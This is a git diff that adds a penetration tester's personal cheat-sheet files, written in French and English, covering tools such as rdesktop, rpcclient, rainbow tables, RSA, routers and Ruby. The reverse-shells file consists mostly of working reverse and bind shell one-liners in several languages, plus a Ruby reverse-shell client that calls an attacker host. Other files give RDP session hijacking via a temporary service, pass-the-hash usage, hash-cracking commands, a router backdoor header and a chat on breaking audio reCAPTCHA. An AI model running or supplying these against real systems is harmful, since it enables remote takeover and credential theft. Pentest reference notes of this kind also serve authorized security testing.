+[f for f in os.listdir(dirname) if os.path.isfile(os.path.join(dirname, f))]
+files = [os.path.normcase(f) for f in os.listdir(directory)]
+files = [os.path.join(directory, f) for f in files if os.path.splitext(f)[1] in exts]
+
+glob.glob('c:\\music\\*\\*.mp3')
+
+# nested functions
+la fonction ne peut etre appelée que par la fonction dans laquelle elle est définie
+
+# re
+r'\bROAD\b' # raw string pas besoin de faire \\b (word boundary) et r'\t' s'interpret '\t' et non tab
+
+re.VERBOSE
+
+# ipython
+#http://pages.physics.cornell.edu/~myers/teaching/ComputationalMethods/python/ipython.html
+whos
+monobjet? ou ??
+%pdef, %psource, %pfile, %psearch
+
+%pdb    # debugger on stacktrace
+%run -d # br on first line mais bug pour l'instant
+%run -p
+
+var = Out[19] ou _19
+exec In[22:29]+In[34]
+
+var = !uname -a
+!echo $var
+
+%edit -p
+%edit _NN
+
+%store
+
+# threads and sigint/keyboardinterrupt
+http://code.activestate.com/recipes/496735-workaround-for-missed-sigint-in-multithreaded-prog/
+
+
diff --git a/Cheat Sheet/qrcode b/Cheat Sheet/qrcode
new file mode 100644
index 0000000..7e4eaa1
--- /dev/null
+++ b/Cheat Sheet/qrcode	
@@ -0,0 +1,4 @@
+# qr codes
+
+zbarimg
+qrtools
diff --git a/Cheat Sheet/rainbow_tables b/Cheat Sheet/rainbow_tables
new file mode 100644
index 0000000..cdac10b
--- /dev/null
+++ b/Cheat Sheet/rainbow_tables	
@@ -0,0 +1,12 @@
+# rainbow crack
+
+## tables
+http://code.google.com/p/rainbowcrack-mc/
+http://code.google.com/p/linuxrainbowcrack/
+
+## rcrack
+# rainbow tables pour casser les empreintes NTLM
+rcracki -l ntlm_hashes /data3/rainbowtables_indexees/ntlm/ntlm_mixalpha-numeric#1-8_0/*rti
+
+# rcrack d'une empreinte MD5
+rcrack /data/rainbowtables/md5/md5_loweralpha-numeric-all-space_1-7/md5_loweralpha-numeric-all-space#1-7_* -h eb384f03fcf9cd0b5bfcefd79bfc7e50
diff --git a/Cheat Sheet/rdesktop b/Cheat Sheet/rdesktop
new file mode 100644
index 0000000..572bfc5
--- /dev/null
+++ b/Cheat Sheet/rdesktop	
@@ -0,0 +1,52 @@
+# rdesktop - remote desktop - rdp
+
+# lister les sessions
+qwinsta
+or
+query session
+
+# partage d'un disque, clavier fr, et une "color depth" de 16 NB. à confirmer
+# mais apparemment ça ne marche pas sur XP, mais marche avec 2003
+rdesktop  -r disk:tmp=/home/sm/tmp -k fr -g 1024x768 -a 16 1.2.3.4
+windows: \\tsclient\tmp
+
+# Services Terminal Server / remote desktop / TermService
+
+# Conditions pour que le service TermService se lance maintenant et
+# automatiquement apres demarrage (cf. msf3/scripts/meterpreter/getgui.rb)
+
+1) autoriser les connexions
+HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections == 0
+
+2) persistence au reboot
+HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService\Start == 2
+Ou bien:
+sc config termservice start= auto
+
+3) lancer maintenant
+sc start termservice
+
+4) utilisateur doit etre dans le groupe local Administrateurs ou Utilisateurs du bureau à distance et ne doit pas avoir un mot de passe vide
+  en: net localgroup "Remote Desktop Users" seb /add
+  fr: net localgroup "Utilisateurs du Bureau à distance" seb /add
+
+# MITM de session RDP
+http://isc.sans.org/diary.html?storyid=7303
+
+# take over open session
+# http://blog.gentilkiwi.com/securite/vol-de-session-rdp 
+C:\Windows\system32>query session
+ SESSION           UTILISATEUR              ID  ÉTAT    TYPE        PÉRIPHÉRIQUE
+ services                                    0  Déco
+ console                                     1  Conn
+>rdp-tcp#1         user1                     2  Actif   rdpwd
+ rdp-tcp#0         toto                      3  Actif   rdpwd
+ rdp-tcp                                 65536  Écouter
+
+rdp-tcp#0 est la session que nous voulons voler, rdp-tcp#1 est notre session ouverte
+
+sc create givemerdp binpath= "cmd /k tscon rdp-tcp#0 /dest:rdp-tcp#1" type= own
+sc start  givemerdp
+sc delete givemerdp # cleanup when finished
+ou
+lancer tscon avec psexec -s
diff --git a/Cheat Sheet/realvnc b/Cheat Sheet/realvnc
new file mode 100644
index 0000000..68a79b5
--- /dev/null
+++ b/Cheat Sheet/realvnc	
@@ -0,0 +1,45 @@
+# realvnc
+
+# disable_blacklist.reg
+Windows Registry Editor Version 5.00
+
+[HKEY_CURRENT_USER\SOFTWARE\RealVNC]
+
+[HKEY_CURRENT_USER\SOFTWARE\RealVNC\WinVNC4]
+"BlacklistTimeout"="0"
+
+# export
+Windows Registry Editor Version 5.00
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\RealVNC]
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\RealVNC\WinVNC4]
+"Password"=hex:ee,5b,0e,48,c8,fe,97,71
+"SecurityTypes"="VncAuth"
+"ReverseSecurityTypes"="None"
+"QueryConnect"=dword:00000000
+"QueryOnlyIfLoggedOn"=dword:00000000
+"PortNumber"=dword:0000170c
+"IdleTimeout"=dword:00000e10
+"HTTPPortNumber"=dword:000016a8
+"LocalHost"=dword:00000000
+"Hosts"="+255.255.255.255/0.0.0.0,"
+"AcceptKeyEvents"=dword:00000001
+"AcceptPointerEvents"=dword:00000001
+"AcceptCutText"=dword:00000001
+"SendCutText"=dword:00000001
+"DisableLocalInputs"=dword:00000000
+"DisconnectClients"=dword:00000001
+"AlwaysShared"=dword:00000000
+"NeverShared"=dword:00000000
+"DisconnectAction"="None"
+"RemoveWallpaper"=dword:00000000
+"RemovePattern"=dword:00000000
+"DisableEffects"=dword:00000000
+"UpdateMethod"=dword:00000001
+"PollConsoleWindows"=dword:00000001
+"UseCaptureBlt"=dword:00000001
+"UseHooks"=dword:00000001
+"Protocol3.3"=dword:00000000
+"BlacklistTimeout"="2"
+
diff --git a/Cheat Sheet/recaptcha b/Cheat Sheet/recaptcha
new file mode 100644
index 0000000..fb54a51
--- /dev/null
+++ b/Cheat Sheet/recaptcha	
@@ -0,0 +1,35 @@
+# recaptcha
+
+02:19 < lanjelot> hi guys, i'm looking into stiltwakler v2 because the audio recaptcha used by the website i am pentesting gives 3 groups of 3 digits
+02:20 < lanjelot> and sometimes, 1 group of 4 digits and 2 groups of 3 digits
+02:29 < lanjelot> stiltwalkerv2 fails at guessing the 9 digits
+02:37 < lanjelot> i've changed number_of_words_per_piece and number_of_pieces to 3 of course
+02:38 < lanjelot> but the fuckit_splitter fails at splitting the .mp3 correctly i guess, as some of the .wav contain more than 1 digit
+03:30 -!- jeffball [~jeff@c-69-242-197-112.hsd1.sc.comcast.net] has joined #dc-949
+04:54 < lanjelot> i've modified fuckit_splitter.py with pixels[x,y][0] >= 250 and pixels[x,y][1] >= 200 to have 3 groups right away
+04:55 < lanjelot> and i've changed sample_rate = 16000  in splitterbase.py
+04:56 < lanjelot> the different .wav match every digits better now, but the guesses are still all wrong :(
+05:05 < lanjelot> do i need to train the neural network?
+05:31 < jeffball> it's been a while since I trained it, so I aplogize if some steps are incomplete
+05:31 < jeffball> but essentially you need a directory in the format of: solved_clusters/answer/sample.wav
+05:32 < jeffball> where solved_clusters is the root (name it anything), answer is the letter/digit/word that matches all the samples in that directory
+05:32 < jeffball> and sample###.wav is just any filename under that directory.  The more samples you get the better
+05:34 < jeffball> then run s-plot/splotitup.sh on it: cd s-plot; splotitup.sh solved_clusters/ dat/ $bitmask
+05:35 < jeffball> where bitmask is the type of data you want to train on.  See splot.py for a description.  Generally we used 24, but 8 and 32 worked alright too
+05:37 < jeffball> this generates dat/*.csv for each word/digit/letter.
+05:37 < jeffball> *Just noticed s-plot/README.txt*
+05:56 < jeffball> then run generate_ml_inputs.sh, this will convert those csv's into octave's format in trainingsetx.csv, trainingsety.csv, and y_mappings.txt
+05:57 < jeffball> they'll get copied to image-neural-network folder
+05:58 < jeffball> then you can run image-neural-network/trainNN3.m with octave: octave trainNN3.m arguments
+05:58 < jeffball> Usage: octave trainNN3.m inputs hidden iterations save_every name_prefix inputx inputy output
+05:59 < jeffball> and that will create the theta values you can use to solve with.
+06:09 < lanjelot> right, i just remembered downloading the corpus. I understand now why the sample_rate was hard-coded
+06:19 < lanjelot> jeffball: how come the recaptcha that this website is using looks like it could be solved by stiltwalker?
+06:21 < lanjelot> didn't Google roll back reCAPTCHA to the difficult version (for humans) after you released stiltwalker v3?
+06:22 < lanjelot> or is it that reCAPTCHA customers can choose to have an old version, hence usable for blind people
+11:52 < jeffball> reCAPTCHA switched to a had version but then moved towards a different version with just quick numbers, similar to round 2
+11:53 < jeffball> it's different in that the number of digits in each of the 3 sections is varriable (mostly 3 or 4), perhaps to try to mess with the fuckit splitter.  Their goal is not that you can't decipher 
+                  the digits, but that you can't split them.  In all honesty it's probably capable of being broken, but we just haven't the time/motivation to release another round
+11:54 < jeffball> if you get splitting to work, do a bnuch of the captchas and retrain, you'll probably break it
+11:54 < jeffball> *switched to a bad version
+12:46 < lanjelot> cool thx for clarifying that up 
diff --git a/Cheat Sheet/recon b/Cheat Sheet/recon
new file mode 100644
index 0000000..afc5443
--- /dev/null
+++ b/Cheat Sheet/recon	
@@ -0,0 +1,19 @@
+# recon / info gathering / OSINT
+
+# DNS lookup for all IPv4 PTR records
+https://scans.io/study/sonar.rdns
+
+# HTTP GET request for all IPv4 hosts with an open 80/TCP
+https://scans.io/study/sonar.http
+
+# domain tool box
+https://w3dt.net/
+
+# social media reconnaissance
+http://raidersec.blogspot.com.au/2012/12/automated-open-source-intelligence.html
+
+# check where a nickname is registered (on what websites)
+http://namechk.com/
+
+# twitter tinfoleak
+http://www.vicenteaguileradiaz.com/tools/
diff --git a/Cheat Sheet/record-screen b/Cheat Sheet/record-screen
new file mode 100644
index 0000000..5a5d50a
--- /dev/null
+++ b/Cheat Sheet/record-screen	
@@ -0,0 +1,18 @@
+# record-screen
+
+# to .gif
+byzanz
+
+# mieux que recordmydesktop
+kazam
+
+# recordmydesktop
+recordmydesktop --no-sound --overwrite --pause-shortcut Control+p -o blah.ogv -x 2878 -y 8 --width 1049 --height 613
+ffmpeg -i blah.ogv -c:v libx264 -preset veryslow -qp 0 /tmp/woot.mp4
+
+# gif screencast of terminal
+https://github.com/KeyboardFire/mkcast
+
+# script
+script --timing=plop foo                                                                                                                                                                    │
+scriptreplay -t plop foo
diff --git a/Cheat Sheet/redhat b/Cheat Sheet/redhat
new file mode 100644
index 0000000..e6b238d
--- /dev/null
+++ b/Cheat Sheet/redhat	
@@ -0,0 +1,4 @@
+# redhat rhn
+
+https://rhn.redhat.com/errata/rhel-server-errata-security.html
+https://access.redhat.com/site/articles/3078
diff --git a/Cheat Sheet/redis b/Cheat Sheet/redis
new file mode 100644
index 0000000..f2ba299
--- /dev/null
+++ b/Cheat Sheet/redis	
@@ -0,0 +1,4 @@
+# redis
+
+# message queue (MQ) & broker injection tool
+https://github.com/cr0hn/enteletaor
diff --git a/Cheat Sheet/rest b/Cheat Sheet/rest
new file mode 100644
index 0000000..ce8d908
--- /dev/null
+++ b/Cheat Sheet/rest	
@@ -0,0 +1,3 @@
+# rest
+
+https://www.owasp.org/index.php/REST_Security_Cheat_Sheet
diff --git a/Cheat Sheet/reverse-shells b/Cheat Sheet/reverse-shells
new file mode 100644
index 0000000..248246d
--- /dev/null
+++ b/Cheat Sheet/reverse-shells	
@@ -0,0 +1,203 @@
+# reverse-shells
+
+# find an outbound port
+http://portquiz.net/
+http://letmeoutofyour.net/
+
+# file transfer over DNS
+https://github.com/breenmachine/dnsftp
+http://breenmachine.blogspot.ca/2014/09/transfer-file-over-dns-in-windows-with.html # DNS tunnel with powershell
+
+# file transfer with uuencode
+http://www.terrencemiao.com/Webmail/msg00022.html
+
+# if on windows and has powershell, use PowerSploit (bonus: will bypass AV)
+http://www.pentestgeek.com/2013/07/19/invoke-shellcode/
+
+# sources
+https://highon.coffee/blog/reverse-shell-cheat-sheet/
+http://www.hsc-news.com/archives/2011/000082.html
+http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+http://bernardodamele.blogspot.fr/2011/09/reverse-shells-one-liners.html
+http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
+fuzzdb/attack-payloads/os-cmd-execution/reverse-shell-one-liners.doc.txt
+https://highon.coffee/blog/reverse-shell-cheat-sheet/
+
+## bind shell with hping and uid 0
+hping -I eth0 -p 22 --listen s3cr3t | /bin/sh
+moi: echo s3cr3t | nc -v victim 22
+
+## le vpn du pauvre
+sshuttle https://github.com/apenwarr/sshuttle
+
+## icmp
+ptunnel (written in c & needs libpcap on client)
+soicmp (written in python & needs pcapy+libpcap on client)
+icmpshell (wirtten in c & no deps, bind shell only)
+icmpsh (client only windows)
+tcpovericmp (https://github.com/Maksadbek/tcpovericmp)
+icmptunnel (https://github.com/DhavalKapil/icmptunnel)
+
+## sctp
+python-pty-shells
+
+## udp
+python-pty-shells, ./udptunnel, pwnat, chownat
+
+## dns
+dnsxss
+dnscat2, dnscat (included in http://www.skullsecurity.org/wiki/index.php/Nbtool)
+iodine
+heyoka
+dns2tcp
+
+## ipv6
+??
+
+## tcp
+# bind shell
+# netcat without -e
+sh -c "mkfifo /tmp/.f;nc -lp 4444 </tmp/.f|sh >/tmp/.f 2>&1" #beware not all nc support this -lp 1234 syntax
+
+# bind on already used port
+https://github.com/sghctoma/multipass
+
+## reverse shell
+# netcat without
+rm /tmp/f; mkfifo /tmp/f (ou mknod fifo p); nc 10.6.6.6 8888 </tmp/.f |sh  >/tmp/.f 2>&1 #hsc
+rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 >/tmp/f #pm
+
+# telnet (hsc)
+moi: nc -l -p 8888 et nc -l -p 9999
+telnet 10.6.6.6 8888 | /bin/sh | telnet 10.6.6.6 9999
+
+# socat
+moi: socat tcp-l:8888,fork,reuseaddr -
+clt: socat tcp-connect:10.6.6.6:8888 exec:'bash -i',pty,stderr,setsid,sigint,sane #hsc
+
+# socat pty -> proxy CONNECT but surviving the proxy dropping the CONNECT connexion
+moi term1: socat TCP-LISTEN:8888,forever,interval=1,fork file:`tty`,echo=0,raw
+moi term2: mkfifo f; while :; do nc -vnlp 443 < f | nc -vn 127.0.0.1 8888 > f; done
+clt: socat -d exec:'bash -i',pty,stderr,setsid,sigint,sane proxy:192.168.122.1:127.0.0.1:443,proxyport=3128,forever,interval=1,fork
+
+# socat pty -> ssl -> proxy CONNECT 
+moi: socat openssl-listen:443,reuseaddr,fork,cert=cert.pem,key=key.pem,verify=0 file:`tty`,echo=0,raw
+clt term1: socat tcp-l:8443,fork,reuseaddr proxy:$PROXY_IP:$MYBOX_IP:443,proxyport=$PROXY_PORT
+clt term2: while :; do socat exec:'bash -i',pty,stderr,setsid,sigint,sane openssl:127.0.0.1:8443,verify=0; done
+
+# socat pty -> http client -> b64 encryption -> dmz proxy -> http server
+moi: server.py
+clt: socat exec:'path/to/client.py proxy.dmz 3128 jmpbox.com 443' exec:'bash -i',pty,stderr,setsid,sigint,sane,echo=0
+
+# bash pty > http client -> b64 encryption -> dmz proxy -> http server
+moi: server.py
+clt: ./client.py 192.168.122.1 3128 10.6.6.6 443 < f | bash -i &>f
+
+# nc-like with pty
+https://github.com/emptymonkey/revsh
+
+# lsv hsc Dec 2014
+clt:
+require 'pty'
+require 'socket'
+
+def doconnect()
+  begin
+    s = TCPSocket.new 'pentest.attaquant.fr', 4444
+    return s
+  rescue
+    sleep(1)
+    retry
+  end
+end
+
+PTY.spawn("/bin/bash") {|r, w, pid|
+  socket = doconnect
+  loop do
+    r_s = select([r, socket]);
+    output = (r_s[0][0] == socket) ? w : socket
+    begin
+      out = r_s[0][0].read_nonblock(1024)
+      output.write(out)
+    rescue EOFError
+      socket = doconnect
+    end
+  end
+}
+
+# bash
+echo salut > /dev/tcp/1.2.3.4/80 # test if disabled
+bash 0</dev/tcp/1.2.3.4/8888 1>&0 2>&0 #hsc
+bash -i >& /dev/tcp/1.2.3.4/1234 0>&1 #pm
+
+# perl
+perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' #pm
+
+perl -e "use IO::Socket; socket(SOCK, PF_INET, SOCK_STREAM,\
+           getprotobyname('tcp'));\
+          if(connect(SOCK, sockaddr_in(8888,inet_aton('10.6.6.6'))))\
+          {open(STDIN, '>&SOCK');open(STDERR, '>&SOCK');\
+          open(STDOUT, '>&SOCK');exec('/bin/sh');}" #hsc
+
+# php
+php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' #pm
+
+php -r '$socket = fsockopen("10.6.6.6",8888,$errno,$errstr,10);\
+  $descriptorspec = array(0 => array("pipe", "r"), 1=> array("pipe", "w"),\
+  2 => array("pipe", "r"));\
+  $process = proc_open("/bin/sh", $descriptorspec, $pipes);\
+  while(1){ $tocheck = array($pipes[1],$pipes[2],$socket);\
+  $int = stream_select($tocheck,$a =NULL,$b = NULL,0);\
+  if (in_array($pipes[1],$tocheck)) {$input = fread($pipes[1],4999);\
+  fwrite($socket,$input);} if (in_array($pipes[2],$tocheck)) \
+  {$input = fread($pipes[2],4999);fwrite($socket,$input);} \
+  if (in_array($socket,$tocheck)) \
+  { $input = fread($socket,4999);fwrite($pipes[0],$input);}  }' #hsc
+
+# ruby
+ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' #pm
+
+ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.6.6.6","8888");\
+  while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' #hsc
+
+# python
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' #pm
+
+python -c "import sys, socket, os; \
+  handler = socket.socket(socket.AF_INET, socket.SOCK_STREAM); \
+  handler.connect((str('10.6.6.6'), 8888)); os.dup2(handler.fileno(),\
+  sys.stdin.fileno()); os.dup2(handler.fileno(),sys.stdout.fileno());\
+  os.system('/bin/bash')" #hsc
+
+# powershell (hsc)
+tl;dr
+
+# metasploit (hsc)
+
+# java (pm)
+r = Runtime.getRuntime()
+p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
+p.waitFor()
+
+# curl (hsc)
+
+# wget (hsc)
+
+# xterm (pm)
+moi: Xnest :1 ; xhost +targetip
+xterm -display 10.0.0.1:1
+
+# awk
+https://highon.coffee/blog/reverse-shell-cheat-sheet/
+
+# nodejs
+https://wiremask.eu/writeups/reverse-shell-on-a-nodejs-application/
+
+# javascript/rundll32 (windows)
+https://gist.github.com/subTee/f1603fa5c15d5f8825c0 (https://twitter.com/subTee/status/676581725414166529)
+
+# get a tty
+* using expect
+http://pentestmonkey.net/blog/post-exploitation-without-a-tty
+* using python
+python -c 'import pty; pty.spawn("/bin/sh")'
diff --git a/Cheat Sheet/rompager b/Cheat Sheet/rompager
new file mode 100644
index 0000000..09f6e28
--- /dev/null
+++ b/Cheat Sheet/rompager	
@@ -0,0 +1,6 @@
+# allegro rompager
+
+* bof and misfortune cookie only affects 4.07 < 4.34 (CVE-2014-9222 and CVE-2014-9223 fixed in 4.34). Both vulns introducded in 4.07.
+https://www.allegrosoft.com/allegro-software-urges-manufacturers-to-maintain-firmware-for-highest-level-of-embedded-device-security/news-press.html
+
+* see 2-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf
diff --git a/Cheat Sheet/router b/Cheat Sheet/router
new file mode 100644
index 0000000..fd365d6
--- /dev/null
+++ b/Cheat Sheet/router	
@@ -0,0 +1,39 @@
+# router
+
+# Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...)
+https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
+https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html
+...
+
+# netgear
+https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/
+
+# autopwn
+https://github.com/jh00nbr/Routerhunter-2.0
+
+# known remote vuln
+http://www.routerpwn.com/
+
+# linksys (WAG200G)/netgear backdoor
+32764/tcp
+https://github.com/elvanderb/TCP-32764/raw/master/backdoor_description.pptx
+
+# dlink backdoor
+http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
+headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'}
+
+# routeur PE
+Provider Edge : Routeur de périphérie du réseau MPLS Mutualisé
+
+Un routeur Provider Edge (PE) se place entre un ISP et d'autres ISP.
+Le terme "routeur PE" désigne un equipement capable de router les protocoles suivants:
+	- BGP
+	- OSPF
+	- MPLS
+(source: wikipedia)
+
+# routeur CPE
+Equipement réseau d’opérateur localisé dans les locaux du Client (Customer Premises Equipment)
+
+Customer Premises Equipment (CPE) est un équipement qui se trouve dans le site d'un client (d'une entreprise) et qui est raccordé à l'infrastructure d'un opérateur
+(source: http://fr.wikipedia.org/wiki/Customer_Premises_Equipment)
diff --git a/Cheat Sheet/rpcclient b/Cheat Sheet/rpcclient
new file mode 100644
index 0000000..783cee4
--- /dev/null
+++ b/Cheat Sheet/rpcclient	
@@ -0,0 +1,80 @@
+# rpcclient
+
+## TNG
+rpcclient-tng -S 192.168.53.129 -U '%' # -p 445 if "something about rap failed"
+
+srvinfo wksinfo
+lsaquery
+enumdomains
+dominfo
+
+dispinfo
+enumusers
+
+lsaquery + lookupsids
+lsaenumsid + lookupsids
+
+enumgroups (-g|-m)
+samgroupmem "Admins du domaine" # ou "Domain Admins"
+samaliasmem BUILTIN\administrateurs
+svcenum OU service enum
+registry
+eventlog
+
+## SAMBA
+rpcclient -U '%' 192.168.53.129
+
+getusername
+
+srvinfo
+lsaquery
+dsroledominfo
+enumtrust
+querydominfo
+querydominfo 1
+querydominfo 12
+
+querydispinfo # liste detaillee mais partielle des utilisateurs
+enumdomusers # lister les utilisateurs locaux ou du domaine si DC
+
+lsaquery 5 + lookupsids 
+
+enumalsgroups builtin # lister les alias
+queryaliasmem builtin 0x220 # lister les membres de l'alias
+
+# si dans un domaine:
+enumdomgroups
+querygroupmem 0x200 # lister les admins du domaines
+
+## ASTUCES
+
+## pass the hash
+export SMBHASH="xxx:xxx"
+rpcclient -U "administrateur%'
+
+export SMBHASH=qqd3...:9eba...
+./winexe -U administrator //1.2.3.4 "cmd" # marche pas car winexe est 32bit
+
+# SID walkup (if we get STATUS_ACCESS_DENIED) (essayer d'abord avec TNG puis Samba)
+## TNG ou SAMBA
+dominfo (TNG) querydominfo (Samba) -> indique le nombre de users et de groups
+lsaenumsids -> liste des sid
+ou
+lsaquery (TNG) lsaquery 5 (samba) 
+lookupsid S-1-5-21-1715567821-1606980848-725345543-1003 -> puis essayer 1004, 1005, ...
+lookupsids ...
+
+https://github.com/trustedsec/ridenum
+impacket/examples/lookupsid.py
+
+# enumerer les membres du groupe BUILTIN\Administrateurs
+# en essayant les sids 1000, 1001, ...
+## SAMBA
+> queryuseraliases builtin S-1-5-21-1715567821-1606980848-725345543-1000 (500, 1001, ...)
+group rid:[0x220]
+> samlookuprids builtin 0x220
+rid 0x220: Administrateurs (4)
+
+## si la machine est dans un domaine, il faut preciser -W
+rpcclient -W SMA-LATESTWINXP -U 'seb%seb' 192.168.53.130
+
diff --git a/Cheat Sheet/rpcinfo b/Cheat Sheet/rpcinfo
new file mode 100644
index 0000000..e3728e3
--- /dev/null
+++ b/Cheat Sheet/rpcinfo	
@@ -0,0 +1,31 @@
+# rpcinfo / nfs
+
+# mount NFS shares
+https://github.com/bonsaiviking/NfSpy
+mount -vvv -t nfs -o nolock 1.2.3.4:/public /nfsmount
+
+# lister les applications en ecoute sur TCP/UDP:111 ou TCP/UDP:32771
+rpcinfo -p 1.2.3.4
+rpcinfo -n 32771 -p 1.2.3.4
+nmap -sR 1.2.3.4 (-sV inclus -sR)
+
+# lister les NFS shares
+nmap nfs-ls.nse
+
+# rwho 513/udp
+rwho 1.2.3.4
+
+# rusers (RPC program 100002)
+rusers -l 1.2.3.4
+
+# NIS (RPC program 100004)
+pscan/pscan.c (v1.4 par Pluvius) -> essayer -n et -r
+
+# NFS TCP/UDP 2049
+showmount -e 1.2.3.4
+mount 1.2.3.4:/ /mnt/itchy
+ou
+nfsshell
+
+# cool vuln
+https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2010-003/?fid=3767
diff --git a/Cheat Sheet/rpm b/Cheat Sheet/rpm
new file mode 100644
index 0000000..d6e6a64
--- /dev/null
+++ b/Cheat Sheet/rpm	
@@ -0,0 +1,43 @@
+# rpm
+
+# extract rpm
+mkdir blah && cd blah
+rpm2cpio path/to/pkg.rpm | cpio -idmv
+
+# download src, extract blah.src.rpm under ~/rpmbuild/SOURCES and build the binary pkg
+yum install yum-utils rpm-build
+
+install/enable the srpms repos
+yumdownloader --source <pkg>
+or
+rpmbuild --rebuild blah.src.rpm
+yum-builddep <./pkg.spec|./pkg.src.rpm> # will automatically install deps
+
+# pam
+rpm -vih ./pam-xx.src.rpm
+rpmbuild -bp SPECS/pam.spec
+(
+cd BUILD
+rm -fr Linux-PAM-1.1.8
+tar xf ../SOURCES/Linux-PAM-1.1.8.tar.bz2
+cp -r Linux-PAM-1.1.8{,-patch}
+cp -r Linux-PAM-1.1.8{,-orig}
+vi Linux-PAM-1.1.8-path/...
+diff -uNr Linux-PAM-1.1.8-orig/ Linux-PAM-1.1.8-patch/ > ~/rpmbuild/SOURCES/blah.patch 
+)
+vi SOURCES/pam.spec # add patch
+rpmbuild -bb SOURCES/pam.spec
+yum reinstall RPMS/x86_64/pam-1.1.8-17.el6.x86_64.rpm 
+
+# enable debug in pam
+yum install yum-utils rpm-build -y
+wget http://vault.centos.org/7.1.1503/os/Source/SPackages/pam-1.1.8-12.el7.src.rpm
+rpm -ivh ./pam-1.1.8-12.el7.src.rpm
+yum-builddep rpmbuild/SPECS/pam.spec
+sed -i -e 's,^%configure ,%configure --enable-debug ,' rpmbuild/SPECS/pam.spec
+rpmbuild -bb rpmbuild/SPECS/pam.spec
+rpm -Uvh rpmbuild/RPMS/x86_64/pam-1.1.8-12.el7.centos.x86_64.rpm
+echo 'touch /var/run/pam-debug.log; chmod 622 /var/run/pam-debug.log' >> /etc/rc.d/rc.local
+reboot
+# to reinstall official version
+yum downgrade pam
diff --git a/Cheat Sheet/rsa b/Cheat Sheet/rsa
new file mode 100644
index 0000000..ad8129e
--- /dev/null
+++ b/Cheat Sheet/rsa	
@@ -0,0 +1,33 @@
+# rsa
+
+factordb.com may know the prime factors p and q for a given N
+
+* fermat's little theorem states that if p is a prime number
+a^(p-1) = 1 (mod p)
+so
+a^(p-2) * a = 1 (mod p)
+a^(p-2) = a^-1 (mod p)
+
+Q = M * P^A (mod B) we can find P^A with: Q * M^-1 and M^-1 = M^(B-2) (mod B)
+so P^A = Q * M^(B-2) % B and then we need P^-A = P^A^(B-2) (mod B)
+we can then decipher flag M2 with: Q * P^-A % B
+
+* good quick overview
+http://doctrina.org/How-RSA-Works-With-Examples.html
+
+* extract modulus and exponent
+cat pubkey.pem | grep -v -- ----- | tr -d '\r\n' | base64 -d | openssl asn1parse -inform DER -i -strparse 18
+
+* well known attacks
+known factors (factordb etc.)
+common modulus (2 keys with same modulus)
+twin prime (p & q are very close -> fermats)
+common factors (2 moduli with a common prime factor (can be p or q))
+huge modulus -> pow(m, e) didnt wrap so simply decrypt with pow(c, 1/e)
+big exponent -> small d -> wiener attack (or boneh burfee) possible when d < 1/3*N^(1/4)
+very small exponent (like e=3)
+broadcast (same plaintext encrypted with different Ns without padding)
+moar at https://github.com/mimoo/RSA-and-LLL-attacks
+
+* Franklin-Reiter related-message attack (when e=3)
+https://en.wikipedia.org/wiki/Coppersmith%27s_attack#Franklin-Reiter_related-message_attack
diff --git a/Cheat Sheet/ruby b/Cheat Sheet/ruby
new file mode 100644
index 0000000..fb3f9e4
--- /dev/null
+++ b/Cheat Sheet/ruby	
@@ -0,0 +1,151 @@
+# ruby
+
+https://www.owasp.org/index.php/Ruby_on_Rails_Cheatsheet
+https://groups.google.com/forum/#!forum/rubyonrails-security
+http://www.learnstreet.com/lessons/study/ruby
+http://rails-sqli.org/
+http://guides.rubyonrails.org/security.html # the usual security issues and countermeasures
+
+# info disclosure
+cause an error in rails
+production != development mode => look for sensitive info (secret key used for cookies hmac)
+http://website/home?a=1&a[]=1 # discovered by a brisbane guy bjeanes
+http://website/home?x[y]=1&x[y]z=2 # one of the test cases on github
+
+will also tell if it's rails or another ruby framework such as Sinatra
+
+# see talk by joernchen of Phenoelit at hitb 2012 
+
+# mass assignment
+http://guides.rubyonrails.org/v3.2.9/security.html#mass-assignment
+try every field if it's not rails 4 (https://code.tutsplus.com/tutorials/mass-assignment-rails-and-you--net-31695)
+
+# SQLi in RoR CVE-2012-5664
+https://groups.google.com/forum/#!topic/rubyonrails-security/DCNTNp_qjFM
+
+# use #{} to evaluate code. Using the %x arg we were able to execute shell commands.
+http://buer.haus/2017/03/13/airbnb-ruby-on-rails-string-interpolation-led-to-remote-code-execution/
+POST {“listing”:{“directions”:[{“test”:”test1″}]}} instead of {“listing”:{“directions”:”test”}} => "directions":"---\n- !ruby/hash:ActionDispatch::Http::ParamsHashWithIndifferentAccess\n  test: test1\n"
